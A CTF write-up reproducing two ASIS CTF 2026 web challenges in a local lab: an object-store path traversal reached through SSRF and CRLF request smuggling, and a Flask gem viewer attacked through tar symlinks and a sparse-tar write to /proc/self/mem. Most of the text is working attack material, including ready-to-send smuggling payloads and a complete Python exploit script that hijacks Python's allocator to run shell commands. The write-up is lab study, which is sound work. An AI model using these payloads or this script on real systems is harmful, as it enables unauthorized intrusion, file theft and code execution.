ASIS CTF 2026 Challenge Reproduction

All of the challenges below were reproduced in a local environment; I did not solve them during the competition :)

0x01 ASIS_MAIL

The challenge ships with its full source code.
![[Pasted image 20260130144858.png]]

api is a Go program.
sso is the login/auth service, written in Node.js.
objectstore is a home-grown bucket store.

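I started by having an AI analyze the code.

Challenge type and assumptions

  • Type: source code audit + live target/container
  • Assumption: you can reach port 8081 exposed by the front end, and reach objectstore's /files/ entry point through the reverse proxy.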

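## Vulnerabilities and root causes

  1. ObjectStore path traversal read
    objectstore joins the object path directly without normalizing it, and the permission check only tests bucket == "FLAG", so it can be bypassed with ../FLAG/….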
@app.route("/<bucket>/<path:object_name>", methods=["PUT", "GET", "DELETE"])
@require_auth
def object_ops(bucket, object_name, is_admin=False):
    bucket_dir = STORAGE / bucket
    bucket_dir.mkdir(parents=True, exist_ok=True)
    obj_path = bucket_dir / object_name
    ...
    elif request.method == "GET":
        if not obj_path.exists():
            return jsonify({"error":"not found"}), 404
        if bucket == "FLAG" and is_admin is False:
            return jsonify({"error":"forbidden"}), 403
        return send_file(obj_path, as_attachment=True)
  2. The public download endpoint is directly reachable

Nginx proxies /files/ straight to objectstore with no authentication.

    location /files/ {
      proxy_pass http://obj_up/;
      proxy_set_header Host $host;
    }
  3. The flag filename is derived from md5(content)
    On startup, objectstore renames flag.txt to flag-<md5>.txt.

  4. There is an SSRF sink at /api/compose
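
To make the flag-renaming step above concrete, here is a minimal sketch of how a name of the form flag-<md5>.txt could be derived from the file content. The helper name `flag_name` and the choice of the hex digest are assumptions for illustration; the actual startup code of objectstore is not reproduced in this writeup.

```python
import hashlib


def flag_name(content: bytes) -> str:
    # Assumption: the suffix is the hex MD5 digest of the flag file's content.
    return f"flag-{hashlib.md5(content).hexdigest()}.txt"


# Two instances with different flags end up with different filenames.
local_name = flag_name(b"flag{fake}\n")
remote_name = flag_name(b"flag{some-other-secret}\n")
```

Because the name depends on the content, a filename recovered from a local container says nothing about the filename on the remote instance.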

So if the filename is already known, the following PoC reads the flag directly:

POST /api/compose HTTP/1.1
Host: 192.168.126.131:8081
Authorization: Bearer 735ffc48-67d2-4841-9829-13f8c68dfe71
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 307


xml=<message>
<to>u1@asismail.local</to>
<subject>3-list</subject>
<body>2</body>
<attachment_url>http://objectstore:8082/public/3/../../../../../data/FLAG/flag-f18b815262ce4ba0627a2fd21e7fa3b4.txt</attachment_url>
</message>
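
The reason the traversal gets past the bucket check can be reproduced offline. The sketch below mirrors the handler's `STORAGE / bucket / object_name` join in a temporary directory; the helper names `object_path` and `is_contained`, the file `flag-demo.txt`, and the shorter `../` chain are all made up for the demo, and `is_contained` is only one possible hardening, not something from the challenge source.

```python
import tempfile
from pathlib import Path


def object_path(storage: Path, bucket: str, object_name: str) -> Path:
    # Same join as the handler: pathlib keeps ".." segments as they are.
    return storage / bucket / object_name


def is_contained(storage: Path, bucket: str, object_name: str) -> bool:
    # Hypothetical fix: resolve first, then require the result to stay in the bucket.
    bucket_dir = (storage / bucket).resolve()
    return object_path(storage, bucket, object_name).resolve().is_relative_to(bucket_dir)


with tempfile.TemporaryDirectory() as tmp:
    storage = Path(tmp) / "data"
    (storage / "FLAG").mkdir(parents=True)
    (storage / "FLAG" / "flag-demo.txt").write_text("flag{demo}")
    (storage / "public" / "3").mkdir(parents=True)

    bucket, object_name = "public", "3/../../FLAG/flag-demo.txt"
    forbidden = bucket == "FLAG"  # the only condition the handler looks at
    leaked = object_path(storage, bucket, object_name).read_text()
    contained = is_contained(storage, bucket, object_name)
```

Here `forbidden` stays false because the bucket string is "public", yet the file that gets opened lives under FLAG.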

The remote environment is different, though, so the filename has to be obtained by listing the directory.

def require_auth(f):
    @wraps(f)
    def wrapper(*args, **kwargs):
        user_id = request.headers.get("X-User-Id", "")
        if not user_id:
            return jsonify({"error":"authorization required"}), 401
        is_admin = user_id == "999"
        kwargs.update({"is_admin": is_admin})
        return f(*args, **kwargs)
    return wrapper
    
@app.route("/<bucket>", methods=["GET", "POST"])
@require_auth
def bucket_ops(bucket, is_admin=False):
    bucket_dir = STORAGE / bucket
    bucket_dir.mkdir(parents=True, exist_ok=True)
    if request.method == "GET":
        if bucket == "FLAG" and is_admin is False:
            return jsonify({"error":"forbidden"}), 403
        # list query ?list=1
        listing = []
        for p in bucket_dir.rglob('*'):
            if p.is_file():
                rel = p.relative_to(bucket_dir)
                listing.append(str(rel))
        return jsonify({"bucket": bucket, "objects": listing})
    elif request.method == "POST":
        # multipart upload form field 'file'
        if 'file' not in request.files:
            return jsonify({"error":"no file"}), 400
        f = request.files['file']
        filename = str(uuid4()) # f.filename
        dest = bucket_dir / filename
        f.save(dest)
        return jsonify({"bucket": bucket, "key": filename, "url": f"/public/{bucket}/{filename}"}), 201

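Any GET request lists the bucket, except that when both bucket == "FLAG" and is_admin is False hold, the handler returns 403. Note that require_auth only sets is_admin when the X-User-Id header equals 999, but nginx is configured with: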

if ($http_x_user_id != "") {
        return 400;
    }

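So the header cannot be set from the web front end via /files/FLAG?list. Out of ideas on that side, I went on to analyze the Go API program.

The string http+post://download.bin shows up in the binary, which suggests it may support "download via POST" (commonly seen in go-getter).
It turns out attachment_url also accepts http+post:// URLs.
Test: does attachment_url support http+post://, and can it carry headers?
Result: http+post:// is supported, and CRLF injection works.

So I tried it directly: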

curl -s -X POST http://192.168.126.131:8081/api/compose \
  -H "Authorization: Bearer <token>" \
  -F "xml=<message>
        <to>u1@asismail.local</to>
        <subject>list-flag</subject>
        <body>1</body>
        <attachment_url>http+post://objectstore:8082/FLAG?list=1%0d%0aX-User-Id:%20999%0d%0a</attachment_url>
      </message>"

The annoying part is that a POST request goes straight into the elif request.method == "POST": branch. (And that is where I got stuck.)

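Update 2:
I had actually already tried this idea in the first version of this post, and it did not work. It turns out I was just missing a line break :)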

Exploitation idea
Use attachment_url to build a rawTarget that contains %0d%0a.
Use request smuggling to inject a second request:

Payload 1: list the directory

http+post://objectstore:8082/FLAG?list=1 HTTP/1.1\r\n
Host: objectstore:8082\r\n
X-User-Id: 999\r\n
\r\n
GET /FLAG?list=1 HTTP/1.1\r\n
Host: objectstore:8082\r\n
X-User-Id: 999\r\n
\r\n
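
To see why this payload succeeds where the earlier single-header injection did not, it helps to model the bytes that end up on the wire. The sketch below is a rough model under two assumptions that are not confirmed by the source: the client writes the decoded target into the request line unescaped and appends its own ` HTTP/1.1` and Host header, and the server treats every blank line as the end of a header block with no body. `wire_bytes` and `request_lines` are hypothetical helpers.

```python
def wire_bytes(method: str, raw_target: str, host: str) -> str:
    # Assumption: raw_target is placed in the request line without escaping.
    return f"{method} {raw_target} HTTP/1.1\r\nHost: {host}\r\n\r\n"


def request_lines(stream: str) -> list[str]:
    # Rough server model: a blank line ends each header block, bodies are ignored.
    heads = [h for h in stream.split("\r\n\r\n") if h.strip()]
    return [h.split("\r\n")[0].strip() for h in heads]


HOST = "objectstore:8082"
ADMIN = f"Host: {HOST}\r\nX-User-Id: 999\r\n\r\n"

# Decoded form of the first attempt: one injected header, no second request.
first_try = "/FLAG?list=1\r\nX-User-Id: 999\r\n"
# Decoded form of Payload 1: finish the POST, then start a complete GET.
smuggled = f"/FLAG?list=1 HTTP/1.1\r\n{ADMIN}GET /FLAG?list=1 HTTP/1.1\r\n{ADMIN}"

first_try_lines = request_lines(wire_bytes("POST", first_try, HOST))
smuggled_lines = request_lines(wire_bytes("POST", smuggled, HOST))
```

In this model the first attempt is still a single POST, while the smuggled variant yields a POST, then a separate GET carrying X-User-Id: 999, followed by the client's leftover ` HTTP/1.1` fragment.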

URL-encoded version:

http+post://objectstore:8082/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0aGET%20/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0a

Response:
{"bucket":"FLAG","objects":["flag-<md5>.txt"]}

Payload 2: read the file
Substitute the real filename:

http+post://objectstore:8082/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0aGET%20/FLAG/flag-<md5>.txt%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0a
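
Writing these URLs by hand is error-prone, so here is a small sketch that generates both payloads from their raw form. The helpers `percent_encode` and `build_attachment_url` are hypothetical, and the encoder deliberately touches only spaces and CRLF, which is all the payloads above encode.

```python
def percent_encode(raw: str) -> str:
    # Encode only spaces and CRLF, matching the hand-written payloads.
    return raw.replace(" ", "%20").replace("\r\n", "%0d%0a")


def build_attachment_url(host: str, first_target: str, second_target: str,
                         user_id: str = "999") -> str:
    # Header block shared by the outer POST and the smuggled GET.
    headers = f"Host: {host}\r\nX-User-Id: {user_id}\r\n\r\n"
    raw = (
        f"{first_target} HTTP/1.1\r\n{headers}"
        f"GET {second_target} HTTP/1.1\r\n{headers}"
    )
    return f"http+post://{host}{percent_encode(raw)}"


list_url = build_attachment_url("objectstore:8082", "/FLAG?list=1", "/FLAG?list=1")
read_url = build_attachment_url("objectstore:8082", "/FLAG?list=1", "/FLAG/flag-<md5>.txt")
```

`list_url` corresponds to Payload 1 and `read_url` to Payload 2; the `<md5>` placeholder still has to be replaced with the name returned by the listing.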

0x02 Gemviewer

The challenge itself is very simple:

from flask import Flask, abort, request
import tempfile
import tarfile
import gzip
import os

app = Flask(__name__)

@app.route("/")
def index():
    return """<!DOCTYPE html>
<html>
<head><title>Ruby Gems Viewer</title></head>
<body>
<h1>Ruby Gems Metadata Viewer</h1>
<form method='POST' action='/upload' enctype='multipart/form-data'>
<input type='file' name='file' accept='.gem'/>
<input type='submit' value='Upload'/>
</form>
</body>
</html>"""

@app.route("/upload", methods=["POST"])
def upload_file():
    if 'file' not in request.files:
        abort(400, description="No file part in the request")

    file = request.files['file']

    if file.filename == '':
        abort(400, description="No selected file")

    try:
        # .gem files are tar archives containing metadata.gz and data.tar.gz
        with tarfile.open(fileobj=file, mode='r:*') as gem_tar:
            with tempfile.TemporaryDirectory() as temp_dir:
                gem_tar.extractall(path=temp_dir,)

                metadata_path = os.path.join(temp_dir, 'metadata.gz')
                if os.path.exists(metadata_path):
                    try:
                        with gzip.open(metadata_path, 'rt') as gz:
                            metadata_content = gz.read()
                    except OSError:
                        raw_data = open(metadata_path, 'rb').read()
                        abort(400, description="Failed to decompress metadata.gz. The raw data is: " + repr(raw_data))
                    return f"""<!DOCTYPE html>
<html>
<head><title>Gem Metadata</title></head>
<body>
<h1>Gem Metadata</h1>
<pre>{metadata_content}</pre>
<a href="/">Back</a>
</body>
</html>"""

                return "No metadata.gz found in gem file"
    except tarfile.TarError as e:
        abort(400, description="Invalid gem file: " + str(e))

docker-compose.yml

services:
  eztar:
    build: .
    ports:
      - "5000:5000"
    user: "nobody"
    read_only: true
    tmpfs:
      - /tmp:mode=1777,size=64m
    environment:
      - TMPDIR=/tmp

Dockerfile

FROM python:3.13.3-alpine

WORKDIR /app

RUN apk update && apk add build-base && rm -rf /var/cache/apk/*
RUN pip install --no-cache-dir flask gunicorn

COPY app.py /app/

RUN chmod 444 /app/app.py && \
    chmod 555 /app && \
    chown -R root:root /app

RUN echo "flag{fake}" > /flag
RUN chmod 0400 /flag
COPY readflag.c /readflag.c
RUN gcc /readflag.c -o /readflag
RUN chmod 4755 /readflag

USER nobody

EXPOSE 5000

CMD ["gunicorn", "--bind", "0.0.0.0:5000", "app:app"]

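The tarfile handling gives an obvious arbitrary file read. But /flag is mode 0400 and the app runs as nobody, so reading files is not enough: the setuid /readflag binary has to be executed. How do we get that far in a container like this?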
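
The file read can be reproduced locally without the web app. The sketch below builds a tar whose metadata.gz member is a symlink, extracts it the way the handler does, and falls back to reading the raw bytes when gzip decoding fails. The file `secret.txt` is a stand-in for a target such as /proc/self/maps, and `make_symlink_tar` is a hypothetical helper; the explicit `fully_trusted` filter is only there to mimic the permissive default of the Python version in the challenge image.

```python
import gzip
import io
import os
import tarfile
import tempfile


def make_symlink_tar(target: str) -> io.BytesIO:
    # A tar whose only member is metadata.gz, a symlink pointing at `target`.
    link = tarfile.TarInfo("metadata.gz")
    link.type = tarfile.SYMTYPE
    link.linkname = target
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        tf.addfile(link)
    buf.seek(0)
    return buf


# Ask for the permissive filter explicitly where the argument exists.
extract_kwargs = {"filter": "fully_trusted"} if hasattr(tarfile, "fully_trusted_filter") else {}

with tempfile.TemporaryDirectory() as secret_dir, tempfile.TemporaryDirectory() as dest:
    secret = os.path.join(secret_dir, "secret.txt")
    with open(secret, "wb") as f:
        f.write(b"not gzip data")

    with tarfile.open(fileobj=make_symlink_tar(secret), mode="r:*") as tf:
        tf.extractall(path=dest, **extract_kwargs)

    metadata_path = os.path.join(dest, "metadata.gz")
    try:
        with gzip.open(metadata_path, "rt") as gz:
            gz.read()
        leaked = None
    except OSError:
        # Same fallback as the app: return the raw bytes behind the symlink.
        with open(metadata_path, "rb") as f:
            leaked = f.read()
```

Any readable file that is not valid gzip takes the `except OSError` branch, which is exactly the branch the app echoes back in its 400 response.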

For this one, all I can say is: over to the AI.
Exploit chain

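  1. LFI oracle: a tar symlink metadata.gz -> /proc/self/maps leaks the memory map.
  2. Compute base addresses: locate the bases of libpython3.13.so and ld-musl.
  3. Sparse write to /proc/self/mem: craft a GNU sparse tar that writes at chosen addresses.
  4. Tamper with the allocator: overwrite _PyRuntime.allocators so that malloc is redirected to system.
  5. Trigger execution: the next allocation becomes system(cmd).
  6. Read the flag: run /readflag --give-me-the-f|ag > /tmp/flag, then read /tmp/flag through the LFI.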
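
Step 3 depends on how Python's tarfile extracts a member that carries a GNU.sparse.map PAX header: it seeks to each offset in the map and writes the corresponding chunk there. The sketch below shows that behaviour on an ordinary file instead of /proc/self/mem. The helper `make_sparse_tar`, the file name `out.bin`, and the offsets are made up for the demo.

```python
import io
import os
import tarfile
import tempfile


def make_sparse_tar(name: str, writes: list[tuple[int, bytes]], real_size: int) -> io.BytesIO:
    # Store the chunks back to back; GNU.sparse.map says where each one belongs.
    data = b"".join(chunk for _, chunk in writes)
    ti = tarfile.TarInfo(name)
    ti.size = len(data)
    ti.pax_headers = {
        "GNU.sparse.map": ",".join(f"{off},{len(chunk)}" for off, chunk in writes),
        "GNU.sparse.size": str(real_size),
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.PAX_FORMAT) as tf:
        tf.addfile(ti, io.BytesIO(data))
    buf.seek(0)
    return buf


# A plain regular file passes the "data" filter, so use it where available.
extract_kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}

with tempfile.TemporaryDirectory() as dest:
    archive = make_sparse_tar("out.bin", [(4, b"ABC"), (10, b"DE")], real_size=12)
    with tarfile.open(fileobj=archive, mode="r:*") as tf:
        tf.extractall(path=dest, **extract_kwargs)
    with open(os.path.join(dest, "out.bin"), "rb") as f:
        extracted = f.read()
```

The exploit script below uses the same mechanism with addresses as offsets, and keeps GNU.sparse.size small so the final seek and truncate stay small as well.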

Python script

#!/usr/bin/env python3
import io
import os
import tarfile
import gzip
import struct
import time
import requests
import html
import ast

BASE_URL = os.environ.get("GEMVIEWER_URL", "http://127.0.0.1:5000")
UPLOAD_URL = f"{BASE_URL}/upload"

# Offsets from writeup (may need adjustment if binary differs)
PYRUNTIME_OFF = 0x5547e0
OBJ_CTX_OFF = 0x310
OBJ_MALLOC_OFF = 0x318
DEBUG_STORAGE_OFF = 0x338
SYSTEM_OFF = 0x5bb7e

SESSION = requests.Session()


def make_symlink_gem(out_path: str, target: str) -> None:
    link = tarfile.TarInfo("metadata.gz")
    link.type = tarfile.SYMTYPE
    link.linkname = target
    link.size = 0
    with tarfile.open(out_path, "w") as tf:
        tf.addfile(link, None)


def make_basic_gem(out_path: str, text: bytes = b"ping") -> None:
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb") as gz:
        gz.write(text)
    data = buf.getvalue()
    ti = tarfile.TarInfo("metadata.gz")
    ti.size = len(data)
    with tarfile.open(out_path, "w") as tf:
        tf.addfile(ti, io.BytesIO(data))


def make_sparse_mem_gem(out_path: str, writes: list[tuple[int, bytes]]) -> None:
    # writes: list of (address, data) to write into /proc/self/mem
    sparse_map = []
    data_stream = io.BytesIO()
    total_size = 0
    for addr, data in writes:
        sparse_map.append((addr, len(data)))
        data_stream.write(data)
        total_size = max(total_size, addr + len(data))

    ti = tarfile.TarInfo("../../../../proc/self/mem")
    # Keep size small to avoid truncate(EFBIG) on /proc/self/mem
    ti.size = data_stream.tell()
    ti.mtime = int(time.time())
    # Avoid huge truncate() on /proc/self/mem: keep sparse size small.
    ti.pax_headers = {
        "GNU.sparse.map": ",".join(str(x) for pair in sparse_map for x in pair),
        "GNU.sparse.size": str(data_stream.tell()),
    }
    data_stream.seek(0)
    with tarfile.open(out_path, "w", format=tarfile.PAX_FORMAT) as tf:
        tf.addfile(ti, data_stream)


def upload(path: str) -> str:
    with open(path, "rb") as f:
        r = SESSION.post(UPLOAD_URL, files={"file": f}, timeout=20)
    return r.text


def lfi_read(target: str) -> bytes:
    tmp_path = "/tmp/lfi.gem"
    make_symlink_gem(tmp_path, target)
    text = upload(tmp_path)
    marker = "Failed to decompress metadata.gz. The raw data is: "
    if marker in text:
        raw = text.split(marker, 1)[1]
        raw = raw.split("</p>", 1)[0]
        raw = html.unescape(raw)
        # raw should be like: b'...'
        try:
            return ast.literal_eval(raw)
        except Exception:
            return raw.encode("utf-8")
    return text.encode("utf-8")


def parse_bases(maps_text: str) -> tuple[int, int]:
    libpython = None
    ld_musl = None
    for line in maps_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        start = int(parts[0].split("-", 1)[0], 16)
        file_off = int(parts[2], 16)
        if "libpython" in line and "r-xp" in line:
            # Use image base, not segment start.
            libpython = start - file_off
        if "ld-musl" in line and "r-xp" in line:
            # Use image base, not segment start.
            ld_musl = start - file_off
    if libpython is None or ld_musl is None:
        raise RuntimeError("Failed to find libpython or ld-musl base in maps")
    return libpython, ld_musl


def exploit():
    print(f"[+] target: {UPLOAD_URL}")

    print("[+] leaking /proc/self/maps ...")
    maps_raw = lfi_read("/proc/self/maps")
    maps_text = maps_raw.decode("utf-8", errors="ignore")
    libpython_base, ld_base = parse_bases(maps_text)
    print(f"[+] libpython base: 0x{libpython_base:x}")
    print(f"[+] ld-musl base: 0x{ld_base:x}")

    pyruntime = libpython_base + PYRUNTIME_OFF
    obj_ctx = pyruntime + OBJ_CTX_OFF
    obj_malloc = pyruntime + OBJ_MALLOC_OFF
    debug_storage = pyruntime + DEBUG_STORAGE_OFF
    system_addr = ld_base + SYSTEM_OFF

    cmd = b"sh -c '/readflag --give-me-the-f\\|ag > /tmp/flag'\x00"

    print("[+] preparing sparse write to /proc/self/mem ...")
    writes = [
        (debug_storage, cmd),
        (obj_ctx, struct.pack("<Q", debug_storage)),
        (obj_malloc, struct.pack("<Q", system_addr)),
    ]
    sparse_path = "/tmp/sparse_mem.gem"
    make_sparse_mem_gem(sparse_path, writes)

    print("[+] uploading sparse write payload (request may timeout) ...")
    try:
        resp = upload(sparse_path)
        print("[+] sparse upload response (first 200 chars):")
        print(resp[:200])
    except Exception as e:
        print(f"[!] upload error (often expected if worker crashes): {e}")

    print("[+] triggering allocation ...")
    basic_path = "/tmp/basic.gem"
    make_basic_gem(basic_path, b"trigger")
    try:
        upload(basic_path)
    except Exception:
        pass

    print("[+] reading /tmp/flag via LFI ...")
    flag_raw = lfi_read("/tmp/flag")
    print(flag_raw.decode("utf-8", errors="ignore"))


if __name__ == "__main__":
    exploit()